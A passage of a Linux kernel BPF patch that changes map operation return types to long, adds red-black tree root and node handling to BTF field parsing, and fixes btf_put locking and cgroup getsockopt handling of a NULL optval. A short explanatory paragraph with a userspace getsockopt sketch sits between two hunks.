+ }
+ 
+-static int fd_array_map_delete_elem(struct bpf_map *map, void *key)
++static long fd_array_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_array *array = container_of(map, struct bpf_array, map);
+ 	void *old_ptr;
+diff --git a/kernel/bpf/bloom_filter.c b/kernel/bpf/bloom_filter.c
+index 48ee750849f25..b386a8fdf28cc 100644
+--- a/kernel/bpf/bloom_filter.c
++++ b/kernel/bpf/bloom_filter.c
+@@ -41,7 +41,7 @@ static u32 hash(struct bpf_bloom_filter *bloom, void *value,
+ 	return h & bloom->bitset_mask;
+ }
+ 
+-static int bloom_map_peek_elem(struct bpf_map *map, void *value)
++static long bloom_map_peek_elem(struct bpf_map *map, void *value)
+ {
+ 	struct bpf_bloom_filter *bloom =
+ 		container_of(map, struct bpf_bloom_filter, map);
+@@ -56,7 +56,7 @@ static int bloom_map_peek_elem(struct bpf_map *map, void *value)
+ 	return 0;
+ }
+ 
+-static int bloom_map_push_elem(struct bpf_map *map, void *value, u64 flags)
++static long bloom_map_push_elem(struct bpf_map *map, void *value, u64 flags)
+ {
+ 	struct bpf_bloom_filter *bloom =
+ 		container_of(map, struct bpf_bloom_filter, map);
+@@ -73,12 +73,12 @@ static int bloom_map_push_elem(struct bpf_map *map, void *value, u64 flags)
+ 	return 0;
+ }
+ 
+-static int bloom_map_pop_elem(struct bpf_map *map, void *value)
++static long bloom_map_pop_elem(struct bpf_map *map, void *value)
+ {
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static int bloom_map_delete_elem(struct bpf_map *map, void *value)
++static long bloom_map_delete_elem(struct bpf_map *map, void *value)
+ {
+ 	return -EOPNOTSUPP;
+ }
+@@ -177,8 +177,8 @@ static void *bloom_map_lookup_elem(struct bpf_map *map, void *key)
+ 	return ERR_PTR(-EINVAL);
+ }
+ 
+-static int bloom_map_update_elem(struct bpf_map *map, void *key,
+-				 void *value, u64 flags)
++static long bloom_map_update_elem(struct bpf_map *map, void *key,
++				  void *value, u64 flags)
+ {
+ 	/* The eBPF program should use map_push_elem instead */
+ 	return -EINVAL;
+diff --git a/kernel/bpf/bpf_cgrp_storage.c b/kernel/bpf/bpf_cgrp_storage.c
+index 6cdf6d9ed91df..d4a074247b64d 100644
+--- a/kernel/bpf/bpf_cgrp_storage.c
++++ b/kernel/bpf/bpf_cgrp_storage.c
+@@ -100,8 +100,8 @@ static void *bpf_cgrp_storage_lookup_elem(struct bpf_map *map, void *key)
+ 	return sdata ? sdata->data : NULL;
+ }
+ 
+-static int bpf_cgrp_storage_update_elem(struct bpf_map *map, void *key,
+-					  void *value, u64 map_flags)
++static long bpf_cgrp_storage_update_elem(struct bpf_map *map, void *key,
++					 void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct cgroup *cgroup;
+@@ -132,7 +132,7 @@ static int cgroup_storage_delete(struct cgroup *cgroup, struct bpf_map *map)
+ 	return 0;
+ }
+ 
+-static int bpf_cgrp_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_cgrp_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct cgroup *cgroup;
+ 	int err, fd;
+diff --git a/kernel/bpf/bpf_inode_storage.c b/kernel/bpf/bpf_inode_storage.c
+index 05f4c66c9089f..a8afc656808b2 100644
+--- a/kernel/bpf/bpf_inode_storage.c
++++ b/kernel/bpf/bpf_inode_storage.c
+@@ -97,8 +97,8 @@ static void *bpf_fd_inode_storage_lookup_elem(struct bpf_map *map, void *key)
+ 	return sdata ? sdata->data : NULL;
+ }
+ 
+-static int bpf_fd_inode_storage_update_elem(struct bpf_map *map, void *key,
+-					 void *value, u64 map_flags)
++static long bpf_fd_inode_storage_update_elem(struct bpf_map *map, void *key,
++					     void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct file *f;
+@@ -133,7 +133,7 @@ static int inode_storage_delete(struct inode *inode, struct bpf_map *map)
+ 	return 0;
+ }
+ 
+-static int bpf_fd_inode_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_fd_inode_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct file *f;
+ 	int fd, err;
+diff --git a/kernel/bpf/bpf_struct_ops.c b/kernel/bpf/bpf_struct_ops.c
+index ece9870cab68e..36c17271d38bd 100644
+--- a/kernel/bpf/bpf_struct_ops.c
++++ b/kernel/bpf/bpf_struct_ops.c
+@@ -349,8 +349,8 @@ int bpf_struct_ops_prepare_trampoline(struct bpf_tramp_links *tlinks,
+ 					   model, flags, tlinks, NULL);
+ }
+ 
+-static int bpf_struct_ops_map_update_elem(struct bpf_map *map, void *key,
+-					  void *value, u64 flags)
++static long bpf_struct_ops_map_update_elem(struct bpf_map *map, void *key,
++					   void *value, u64 flags)
+ {
+ 	struct bpf_struct_ops_map *st_map = (struct bpf_struct_ops_map *)map;
+ 	const struct bpf_struct_ops *st_ops = st_map->st_ops;
+@@ -524,7 +524,7 @@ unlock:
+ 	return err;
+ }
+ 
+-static int bpf_struct_ops_map_delete_elem(struct bpf_map *map, void *key)
++static long bpf_struct_ops_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	enum bpf_struct_ops_state prev_state;
+ 	struct bpf_struct_ops_map *st_map;
+diff --git a/kernel/bpf/bpf_task_storage.c b/kernel/bpf/bpf_task_storage.c
+index 1e486055a523d..b29f0bf28fd15 100644
+--- a/kernel/bpf/bpf_task_storage.c
++++ b/kernel/bpf/bpf_task_storage.c
+@@ -127,8 +127,8 @@ out:
+ 	return ERR_PTR(err);
+ }
+ 
+-static int bpf_pid_task_storage_update_elem(struct bpf_map *map, void *key,
+-					    void *value, u64 map_flags)
++static long bpf_pid_task_storage_update_elem(struct bpf_map *map, void *key,
++					     void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct task_struct *task;
+@@ -180,7 +180,7 @@ static int task_storage_delete(struct task_struct *task, struct bpf_map *map,
+ 	return 0;
+ }
+ 
+-static int bpf_pid_task_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_pid_task_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct task_struct *task;
+ 	unsigned int f_flags;
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 9880faa7e6760..6f3326417f27e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -566,8 +566,8 @@ static s32 bpf_find_btf_id(const char *name, u32 kind, struct btf **btf_p)
+ 			*btf_p = btf;
+ 			return ret;
+ 		}
+-		spin_lock_bh(&btf_idr_lock);
+ 		btf_put(btf);
++		spin_lock_bh(&btf_idr_lock);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	return ret;
+@@ -3228,7 +3228,7 @@ struct btf_field_info {
+ 		struct {
+ 			const char *node_name;
+ 			u32 value_btf_id;
+-		} list_head;
++		} graph_root;
+ 	};
+ };
+ 
+@@ -3305,12 +3305,14 @@ static const char *btf_find_decl_tag_value(const struct btf *btf,
+ 	return NULL;
+ }
+ 
+-static int btf_find_list_head(const struct btf *btf, const struct btf_type *pt,
+-			      const struct btf_type *t, int comp_idx,
+-			      u32 off, int sz, struct btf_field_info *info)
++static int
++btf_find_graph_root(const struct btf *btf, const struct btf_type *pt,
++		    const struct btf_type *t, int comp_idx, u32 off,
++		    int sz, struct btf_field_info *info,
++		    enum btf_field_type head_type)
+ {
++	const char *node_field_name;
+ 	const char *value_type;
+-	const char *list_node;
+ 	s32 id;
+ 
+ 	if (!__btf_type_is_struct(t))
+@@ -3320,26 +3322,32 @@ static int btf_find_list_head(const struct btf *btf, const struct btf_type *pt,
+ 	value_type = btf_find_decl_tag_value(btf, pt, comp_idx, "contains:");
+ 	if (!value_type)
+ 		return -EINVAL;
+-	list_node = strstr(value_type, ":");
+-	if (!list_node)
++	node_field_name = strstr(value_type, ":");
++	if (!node_field_name)
+ 		return -EINVAL;
+-	value_type = kstrndup(value_type, list_node - value_type, GFP_KERNEL | __GFP_NOWARN);
++	value_type = kstrndup(value_type, node_field_name - value_type, GFP_KERNEL | __GFP_NOWARN);
+ 	if (!value_type)
+ 		return -ENOMEM;
+ 	id = btf_find_by_name_kind(btf, value_type, BTF_KIND_STRUCT);
+ 	kfree(value_type);
+ 	if (id < 0)
+ 		return id;
+-	list_node++;
+-	if (str_is_empty(list_node))
++	node_field_name++;
++	if (str_is_empty(node_field_name))
+ 		return -EINVAL;
+-	info->type = BPF_LIST_HEAD;
++	info->type = head_type;
+ 	info->off = off;
+-	info->list_head.value_btf_id = id;
+-	info->list_head.node_name = list_node;
++	info->graph_root.value_btf_id = id;
++	info->graph_root.node_name = node_field_name;
+ 	return BTF_FIELD_FOUND;
+ }
+ 
++#define field_mask_test_name(field_type, field_type_str) \
++	if (field_mask & field_type && !strcmp(name, field_type_str)) { \
++		type = field_type;					\
++		goto end;						\
++	}
++
+ static int btf_get_field_type(const char *name, u32 field_mask, u32 *seen_mask,
+ 			      int *align, int *sz)
+ {
+@@ -3363,18 +3371,11 @@ static int btf_get_field_type(const char *name, u32 field_mask, u32 *seen_mask,
+ 			goto end;
+ 		}
+ 	}
+-	if (field_mask & BPF_LIST_HEAD) {
+-		if (!strcmp(name, "bpf_list_head")) {
+-			type = BPF_LIST_HEAD;
+-			goto end;
+-		}
+-	}
+-	if (field_mask & BPF_LIST_NODE) {
+-		if (!strcmp(name, "bpf_list_node")) {
+-			type = BPF_LIST_NODE;
+-			goto end;
+-		}
+-	}
++	field_mask_test_name(BPF_LIST_HEAD, "bpf_list_head");
++	field_mask_test_name(BPF_LIST_NODE, "bpf_list_node");
++	field_mask_test_name(BPF_RB_ROOT,   "bpf_rb_root");
++	field_mask_test_name(BPF_RB_NODE,   "bpf_rb_node");
++
+ 	/* Only return BPF_KPTR when all other types with matchable names fail */
+ 	if (field_mask & BPF_KPTR) {
+ 		type = BPF_KPTR_REF;
+@@ -3387,6 +3388,8 @@ end:
+ 	return type;
+ }
+ 
++#undef field_mask_test_name
++
+ static int btf_find_struct_field(const struct btf *btf,
+ 				 const struct btf_type *t, u32 field_mask,
+ 				 struct btf_field_info *info, int info_cnt)
+@@ -3419,6 +3422,7 @@ static int btf_find_struct_field(const struct btf *btf,
+ 		case BPF_SPIN_LOCK:
+ 		case BPF_TIMER:
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			ret = btf_find_struct(btf, member_type, off, sz, field_type,
+ 					      idx < info_cnt ? &info[idx] : &tmp);
+ 			if (ret < 0)
+@@ -3432,8 +3436,11 @@ static int btf_find_struct_field(const struct btf *btf,
+ 				return ret;
+ 			break;
+ 		case BPF_LIST_HEAD:
+-			ret = btf_find_list_head(btf, t, member_type, i, off, sz,
+-						 idx < info_cnt ? &info[idx] : &tmp);
++		case BPF_RB_ROOT:
++			ret = btf_find_graph_root(btf, t, member_type,
++						  i, off, sz,
++						  idx < info_cnt ? &info[idx] : &tmp,
++						  field_type);
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
+@@ -3480,6 +3487,7 @@ static int btf_find_datasec_var(const struct btf *btf, const struct btf_type *t,
+ 		case BPF_SPIN_LOCK:
+ 		case BPF_TIMER:
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			ret = btf_find_struct(btf, var_type, off, sz, field_type,
+ 					      idx < info_cnt ? &info[idx] : &tmp);
+ 			if (ret < 0)
+@@ -3493,8 +3501,11 @@ static int btf_find_datasec_var(const struct btf *btf, const struct btf_type *t,
+ 				return ret;
+ 			break;
+ 		case BPF_LIST_HEAD:
+-			ret = btf_find_list_head(btf, var, var_type, -1, off, sz,
+-						 idx < info_cnt ? &info[idx] : &tmp);
++		case BPF_RB_ROOT:
++			ret = btf_find_graph_root(btf, var, var_type,
++						  -1, off, sz,
++						  idx < info_cnt ? &info[idx] : &tmp,
++						  field_type);
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
+@@ -3596,21 +3607,25 @@ end_btf:
+ 	return ret;
+ }
+ 
+-static int btf_parse_list_head(const struct btf *btf, struct btf_field *field,
+-			       struct btf_field_info *info)
++static int btf_parse_graph_root(const struct btf *btf,
++				struct btf_field *field,
++				struct btf_field_info *info,
++				const char *node_type_name,
++				size_t node_type_align)
+ {
+ 	const struct btf_type *t, *n = NULL;
+ 	const struct btf_member *member;
+ 	u32 offset;
+ 	int i;
+ 
+-	t = btf_type_by_id(btf, info->list_head.value_btf_id);
++	t = btf_type_by_id(btf, info->graph_root.value_btf_id);
+ 	/* We've already checked that value_btf_id is a struct type. We
+ 	 * just need to figure out the offset of the list_node, and
+ 	 * verify its type.
+ 	 */
+ 	for_each_member(i, t, member) {
+-		if (strcmp(info->list_head.node_name, __btf_name_by_offset(btf, member->name_off)))
++		if (strcmp(info->graph_root.node_name,
++			   __btf_name_by_offset(btf, member->name_off)))
+ 			continue;
+ 		/* Invalid BTF, two members with same name */
+ 		if (n)
+@@ -3618,24 +3633,38 @@ static int btf_parse_list_head(const struct btf *btf, struct btf_field *field,
+ 		n = btf_type_by_id(btf, member->type);
+ 		if (!__btf_type_is_struct(n))
+ 			return -EINVAL;
+-		if (strcmp("bpf_list_node", __btf_name_by_offset(btf, n->name_off)))
++		if (strcmp(node_type_name, __btf_name_by_offset(btf, n->name_off)))
+ 			return -EINVAL;
+ 		offset = __btf_member_bit_offset(n, member);
+ 		if (offset % 8)
+ 			return -EINVAL;
+ 		offset /= 8;
+-		if (offset % __alignof__(struct bpf_list_node))
++		if (offset % node_type_align)
+ 			return -EINVAL;
+ 
+-		field->list_head.btf = (struct btf *)btf;
+-		field->list_head.value_btf_id = info->list_head.value_btf_id;
+-		field->list_head.node_offset = offset;
++		field->graph_root.btf = (struct btf *)btf;
++		field->graph_root.value_btf_id = info->graph_root.value_btf_id;
++		field->graph_root.node_offset = offset;
+ 	}
+ 	if (!n)
+ 		return -ENOENT;
+ 	return 0;
+ }
+ 
++static int btf_parse_list_head(const struct btf *btf, struct btf_field *field,
++			       struct btf_field_info *info)
++{
++	return btf_parse_graph_root(btf, field, info, "bpf_list_node",
++					    __alignof__(struct bpf_list_node));
++}
++
++static int btf_parse_rb_root(const struct btf *btf, struct btf_field *field,
++			     struct btf_field_info *info)
++{
++	return btf_parse_graph_root(btf, field, info, "bpf_rb_node",
++					    __alignof__(struct bpf_rb_node));
++}
++
+ struct btf_record *btf_parse_fields(const struct btf *btf, const struct btf_type *t,
+ 				    u32 field_mask, u32 value_size)
+ {
+@@ -3698,7 +3727,13 @@ struct btf_record *btf_parse_fields(const struct btf *btf, const struct btf_type
+ 			if (ret < 0)
+ 				goto end;
+ 			break;
++		case BPF_RB_ROOT:
++			ret = btf_parse_rb_root(btf, &rec->fields[i], &info_arr[i]);
++			if (ret < 0)
++				goto end;
++			break;
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			break;
+ 		default:
+ 			ret = -EFAULT;
+@@ -3707,8 +3742,9 @@ struct btf_record *btf_parse_fields(const struct btf *btf, const struct btf_type
+ 		rec->cnt++;
+ 	}
+ 
+-	/* bpf_list_head requires bpf_spin_lock */
+-	if (btf_record_has_field(rec, BPF_LIST_HEAD) && rec->spin_lock_off < 0) {
++	/* bpf_{list_head, rb_node} require bpf_spin_lock */
++	if ((btf_record_has_field(rec, BPF_LIST_HEAD) ||
++	     btf_record_has_field(rec, BPF_RB_ROOT)) && rec->spin_lock_off < 0) {
+ 		ret = -EINVAL;
+ 		goto end;
+ 	}
+@@ -3719,62 +3755,76 @@ end:
+ 	return ERR_PTR(ret);
+ }
+ 
++#define GRAPH_ROOT_MASK (BPF_LIST_HEAD | BPF_RB_ROOT)
++#define GRAPH_NODE_MASK (BPF_LIST_NODE | BPF_RB_NODE)
++
+ int btf_check_and_fixup_fields(const struct btf *btf, struct btf_record *rec)
+ {
+ 	int i;
+ 
+-	/* There are two owning types, kptr_ref and bpf_list_head. The former
+-	 * only supports storing kernel types, which can never store references
+-	 * to program allocated local types, atleast not yet. Hence we only need
+-	 * to ensure that bpf_list_head ownership does not form cycles.
++	/* There are three types that signify ownership of some other type:
++	 *  kptr_ref, bpf_list_head, bpf_rb_root.
++	 * kptr_ref only supports storing kernel types, which can't store
++	 * references to program allocated local types.
++	 *
++	 * Hence we only need to ensure that bpf_{list_head,rb_root} ownership
++	 * does not form cycles.
+ 	 */
+-	if (IS_ERR_OR_NULL(rec) || !(rec->field_mask & BPF_LIST_HEAD))
++	if (IS_ERR_OR_NULL(rec) || !(rec->field_mask & GRAPH_ROOT_MASK))
+ 		return 0;
+ 	for (i = 0; i < rec->cnt; i++) {
+ 		struct btf_struct_meta *meta;
+ 		u32 btf_id;
+ 
+-		if (!(rec->fields[i].type & BPF_LIST_HEAD))
++		if (!(rec->fields[i].type & GRAPH_ROOT_MASK))
+ 			continue;
+-		btf_id = rec->fields[i].list_head.value_btf_id;
++		btf_id = rec->fields[i].graph_root.value_btf_id;
+ 		meta = btf_find_struct_meta(btf, btf_id);
+ 		if (!meta)
+ 			return -EFAULT;
+-		rec->fields[i].list_head.value_rec = meta->record;
++		rec->fields[i].graph_root.value_rec = meta->record;
+ 
+-		if (!(rec->field_mask & BPF_LIST_NODE))
++		/* We need to set value_rec for all root types, but no need
++		 * to check ownership cycle for a type unless it's also a
++		 * node type.
++		 */
++		if (!(rec->field_mask & GRAPH_NODE_MASK))
+ 			continue;
+ 
+ 		/* We need to ensure ownership acyclicity among all types. The
+ 		 * proper way to do it would be to topologically sort all BTF
+ 		 * IDs based on the ownership edges, since there can be multiple
+-		 * bpf_list_head in a type. Instead, we use the following
+-		 * reasoning:
++		 * bpf_{list_head,rb_root} in a type. Instead, we use the
++		 * following reasoning:
+ 		 *
+ 		 * - A type can only be owned by another type in user BTF if it
+-		 *   has a bpf_list_node.
++		 *   has a bpf_{list,rb}_node. Let's call these node types.
+ 		 * - A type can only _own_ another type in user BTF if it has a
+-		 *   bpf_list_head.
++		 *   bpf_{list_head,rb_root}. Let's call these root types.
+ 		 *
+-		 * We ensure that if a type has both bpf_list_head and
+-		 * bpf_list_node, its element types cannot be owning types.
++		 * We ensure that if a type is both a root and node, its
++		 * element types cannot be root types.
+ 		 *
+ 		 * To ensure acyclicity:
+ 		 *
+-		 * When A only has bpf_list_head, ownership chain can be:
++		 * When A is a root type but not a node, its ownership
++		 * chain can be:
+ 		 *	A -> B -> C
+ 		 * Where:
+-		 * - B has both bpf_list_head and bpf_list_node.
+-		 * - C only has bpf_list_node.
++		 * - A is a root, e.g. has bpf_rb_root.
++		 * - B is both a root and node, e.g. has bpf_rb_node and
++		 *   bpf_list_head.
++		 * - C is only a node, e.g. has bpf_list_node.
+ 		 *
+-		 * When A has both bpf_list_head and bpf_list_node, some other
+-		 * type already owns it in the BTF domain, hence it can not own
+-		 * another owning type through any of the bpf_list_head edges.
++		 * When A is both a root and node, some other type already
++		 * owns it in the BTF domain, hence it can not own
++		 * another root type through any of the ownership edges.
+ 		 *	A -> B
+ 		 * Where:
+-		 * - B only has bpf_list_node.
++		 * - A is both a root and node.
++		 * - B is only a node.
+ 		 */
+-		if (meta->record->field_mask & BPF_LIST_HEAD)
++		if (meta->record->field_mask & GRAPH_ROOT_MASK)
+ 			return -ELOOP;
+ 	}
+ 	return 0;
+@@ -5237,6 +5287,8 @@ static const char *alloc_obj_fields[] = {
+ 	"bpf_spin_lock",
+ 	"bpf_list_head",
+ 	"bpf_list_node",
++	"bpf_rb_root",
++	"bpf_rb_node",
+ };
+ 
+ static struct btf_struct_metas *
+@@ -5310,7 +5362,8 @@ btf_parse_struct_metas(struct bpf_verifier_log *log, struct btf *btf)
+ 
+ 		type = &tab->types[tab->cnt];
+ 		type->btf_id = i;
+-		record = btf_parse_fields(btf, t, BPF_SPIN_LOCK | BPF_LIST_HEAD | BPF_LIST_NODE, t->size);
++		record = btf_parse_fields(btf, t, BPF_SPIN_LOCK | BPF_LIST_HEAD | BPF_LIST_NODE |
++						  BPF_RB_ROOT | BPF_RB_NODE, t->size);
+ 		/* The record cannot be unset, treat it as an error if so */
+ 		if (IS_ERR_OR_NULL(record)) {
+ 			ret = PTR_ERR_OR_ZERO(record) ?: -EFAULT;
+@@ -5795,12 +5848,8 @@ struct btf *bpf_prog_get_target_btf(const struct bpf_prog *prog)
+ 
+ static bool is_int_ptr(struct btf *btf, const struct btf_type *t)
+ {
+-	/* t comes in already as a pointer */
+-	t = btf_type_by_id(btf, t->type);
+-
+-	/* allow const */
+-	if (BTF_INFO_KIND(t->info) == BTF_KIND_CONST)
+-		t = btf_type_by_id(btf, t->type);
++	/* skip modifiers */
++	t = btf_type_skip_modifiers(btf, t->type, NULL);
+ 
+ 	return btf_type_is_int(t);
+ }
+@@ -8136,12 +8185,10 @@ check_modules:
+ 		btf_get(mod_btf);
+ 		spin_unlock_bh(&btf_idr_lock);
+ 		cands = bpf_core_add_cands(cands, mod_btf, btf_nr_types(main_btf));
+-		if (IS_ERR(cands)) {
+-			btf_put(mod_btf);
++		btf_put(mod_btf);
++		if (IS_ERR(cands))
+ 			return ERR_CAST(cands);
+-		}
+ 		spin_lock_bh(&btf_idr_lock);
+-		btf_put(mod_btf);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	/* cands is a pointer to kmalloced memory here if cands->cnt > 0
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index bf2fdb33fb313..819f011f0a9cd 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -1921,14 +1921,17 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	if (ctx.optlen > max_optlen || ctx.optlen < 0) {
++	if (optval && (ctx.optlen > max_optlen || ctx.optlen < 0)) {
+ 		ret = -EFAULT;
+ 		goto out;
+ 	}
+ 
+ 	if (ctx.optlen != 0) {
+-		if (copy_to_user(optval, ctx.optval, ctx.optlen) ||
+-		    put_user(ctx.optlen, optlen)) {
++		if (optval && copy_to_user(optval, ctx.optval, ctx.optlen)) {
++			ret = -EFAULT;
++			goto out;
++		}
++		if (put_user(ctx.optlen, optlen)) {
+ 			ret = -EFAULT;
+ 			goto out;
+ 		}
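This preserves the two-step "probe the size first" pattern for variable-size socket options even when a cgroup BPF getsockopt program is attached: with a NULL optval the kernel now reports the required length via optlen instead of failing with EFAULT. A hedged userspace sketch (fd, level and optname are placeholders; whether a given option accepts a NULL buffer still depends on the option itself):

  socklen_t len = 0;

  /* optval == NULL: only ask for the required length */
  if (getsockopt(fd, level, optname, NULL, &len) == 0)
          /* allocate len bytes, then call getsockopt() again */;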
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index e0b2d016f0bf9..d33785bedbe5d 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -540,7 +540,7 @@ static void __cpu_map_entry_replace(struct bpf_cpu_map *cmap,
+ 	}
+ }
+ 
+-static int cpu_map_delete_elem(struct bpf_map *map, void *key)
++static long cpu_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_cpu_map *cmap = container_of(map, struct bpf_cpu_map, map);
+ 	u32 key_cpu = *(u32 *)key;
+@@ -553,8 +553,8 @@ static int cpu_map_delete_elem(struct bpf_map *map, void *key)
+ 	return 0;
+ }
+ 
+-static int cpu_map_update_elem(struct bpf_map *map, void *key, void *value,
+-			       u64 map_flags)
++static long cpu_map_update_elem(struct bpf_map *map, void *key, void *value,
++				u64 map_flags)
+ {
+ 	struct bpf_cpu_map *cmap = container_of(map, struct bpf_cpu_map, map);
+ 	struct bpf_cpumap_val cpumap_value = {};
+@@ -667,7 +667,7 @@ static int cpu_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
+ 	return 0;
+ }
+ 
+-static int cpu_map_redirect(struct bpf_map *map, u64 index, u64 flags)
++static long cpu_map_redirect(struct bpf_map *map, u64 index, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, index, flags, 0,
+ 				      __cpu_map_lookup_elem);
+diff --git a/kernel/bpf/devmap.c b/kernel/bpf/devmap.c
+index d01e4c55b376a..95dafde24ba9c 100644
+--- a/kernel/bpf/devmap.c
++++ b/kernel/bpf/devmap.c
+@@ -799,7 +799,7 @@ static void __dev_map_entry_free(struct rcu_head *rcu)
+ 	kfree(dev);
+ }
+ 
+-static int dev_map_delete_elem(struct bpf_map *map, void *key)
++static long dev_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *old_dev;
+@@ -814,7 +814,7 @@ static int dev_map_delete_elem(struct bpf_map *map, void *key)
+ 	return 0;
+ }
+ 
+-static int dev_map_hash_delete_elem(struct bpf_map *map, void *key)
++static long dev_map_hash_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *old_dev;
+@@ -885,8 +885,8 @@ err_out:
+ 	return ERR_PTR(-EINVAL);
+ }
+ 
+-static int __dev_map_update_elem(struct net *net, struct bpf_map *map,
+-				 void *key, void *value, u64 map_flags)
++static long __dev_map_update_elem(struct net *net, struct bpf_map *map,
++				  void *key, void *value, u64 map_flags)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *dev, *old_dev;
+@@ -925,15 +925,15 @@ static int __dev_map_update_elem(struct net *net, struct bpf_map *map,
+ 	return 0;
+ }
+ 
+-static int dev_map_update_elem(struct bpf_map *map, void *key, void *value,
+-			       u64 map_flags)
++static long dev_map_update_elem(struct bpf_map *map, void *key, void *value,
++				u64 map_flags)
+ {
+ 	return __dev_map_update_elem(current->nsproxy->net_ns,
+ 				     map, key, value, map_flags);
+ }
+ 
+-static int __dev_map_hash_update_elem(struct net *net, struct bpf_map *map,
+-				     void *key, void *value, u64 map_flags)
++static long __dev_map_hash_update_elem(struct net *net, struct bpf_map *map,
++				       void *key, void *value, u64 map_flags)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *dev, *old_dev;
+@@ -985,21 +985,21 @@ out_err:
+ 	return err;
+ }
+ 
+-static int dev_map_hash_update_elem(struct bpf_map *map, void *key, void *value,
+-				   u64 map_flags)
++static long dev_map_hash_update_elem(struct bpf_map *map, void *key, void *value,
++				     u64 map_flags)
+ {
+ 	return __dev_map_hash_update_elem(current->nsproxy->net_ns,
+ 					 map, key, value, map_flags);
+ }
+ 
+-static int dev_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
++static long dev_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, ifindex, flags,
+ 				      BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS,
+ 				      __dev_map_lookup_elem);
+ }
+ 
+-static int dev_hash_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
++static long dev_hash_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, ifindex, flags,
+ 				      BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS,
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 5dfcb5ad0d068..90852e0e64f26 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1057,8 +1057,8 @@ static int check_flags(struct bpf_htab *htab, struct htab_elem *l_old,
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int htab_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				u64 map_flags)
++static long htab_map_update_elem(struct bpf_map *map, void *key, void *value,
++				 u64 map_flags)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new = NULL, *l_old;
+@@ -1159,8 +1159,8 @@ static void htab_lru_push_free(struct bpf_htab *htab, struct htab_elem *elem)
+ 	bpf_lru_push_free(&htab->lru, &elem->lru_node);
+ }
+ 
+-static int htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				    u64 map_flags)
++static long htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
++				     u64 map_flags)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new, *l_old = NULL;
+@@ -1226,9 +1226,9 @@ err:
+ 	return ret;
+ }
+ 
+-static int __htab_percpu_map_update_elem(struct bpf_map *map, void *key,
+-					 void *value, u64 map_flags,
+-					 bool onallcpus)
++static long __htab_percpu_map_update_elem(struct bpf_map *map, void *key,
++					  void *value, u64 map_flags,
++					  bool onallcpus)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new = NULL, *l_old;
+@@ -1281,9 +1281,9 @@ err:
+ 	return ret;
+ }
+ 
+-static int __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+-					     void *value, u64 map_flags,
+-					     bool onallcpus)
++static long __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
++					      void *value, u64 map_flags,
++					      bool onallcpus)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new = NULL, *l_old;
+@@ -1348,21 +1348,21 @@ err:
+ 	return ret;
+ }
+ 
+-static int htab_percpu_map_update_elem(struct bpf_map *map, void *key,
+-				       void *value, u64 map_flags)
++static long htab_percpu_map_update_elem(struct bpf_map *map, void *key,
++					void *value, u64 map_flags)
+ {
+ 	return __htab_percpu_map_update_elem(map, key, value, map_flags, false);
+ }
+ 
